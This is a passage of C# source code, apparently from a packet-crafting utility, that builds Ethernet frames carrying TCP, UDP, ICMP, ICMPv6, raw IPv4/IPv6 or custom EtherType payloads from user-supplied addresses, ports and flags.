ipPacket.PayloadPacket = tcpPacket;
tcpPacket.PayloadData = param.payload;
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.UDP)
{
UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort);
if (param.dIP.ToString().Contains("."))
{
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ipPacket.UpdateIPChecksum();
ret.PayloadPacket = ipPacket;
}
else
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ipPacket.PayloadPacket = udpPacket;
udpPacket.PayloadData = param.payload;
udpPacket.UpdateUDPChecksum();
ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length);
ret.PayloadPacket = ipPacket;
}
}
else if (param.packetType == Param.PacketType.ICMP)
{
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32]));
if (param.type != 0 && param.code != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code));
}
else if (param.type != 0)
{
icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256));
}
else
{
icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest;
}
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.PayloadPacket = icmpPacket;
ipPacket.Checksum = ipPacket.CalculateIPChecksum();
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.ICMPv6)
{
ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param);
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.PayloadPacket = icmpv6Packet;
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
ret.PayloadPacket = ipPacket;
}
else if (param.packetType == Param.PacketType.IP)
{
if (param.dIP.ToString().Contains("."))
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4);
IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP);
if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; }
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
ipPacket.UpdateIPChecksum();
}
else
{
ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6);
//if extension headers were not specified, just put the payload
if (param.ExtentionHeader.Count == 0)
{
IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP);
ipPacket.Protocol = param.IPProtocol;
ipPacket.PayloadData = param.payload;
ipPacket.PayloadLength = (ushort)param.payload.Length;
ipPacket.UpdateCalculatedValues();
ret.PayloadPacket = ipPacket;
}
else
{
ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret);
}
ret.UpdateCalculatedValues();
}
}
else if (param.packetType == Param.PacketType.EtherType)
{
ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol);
byte[] etherBuffer = (new byte[64]);
var payload = new byte[etherBuffer.Length + (param.payload).Length];
etherBuffer.CopyTo(payload, 0);
(param.payload).CopyTo(payload, etherBuffer.Length);
ret.PayloadData = payload;
ret.UpdateCalculatedValues();
}
return ret;
}
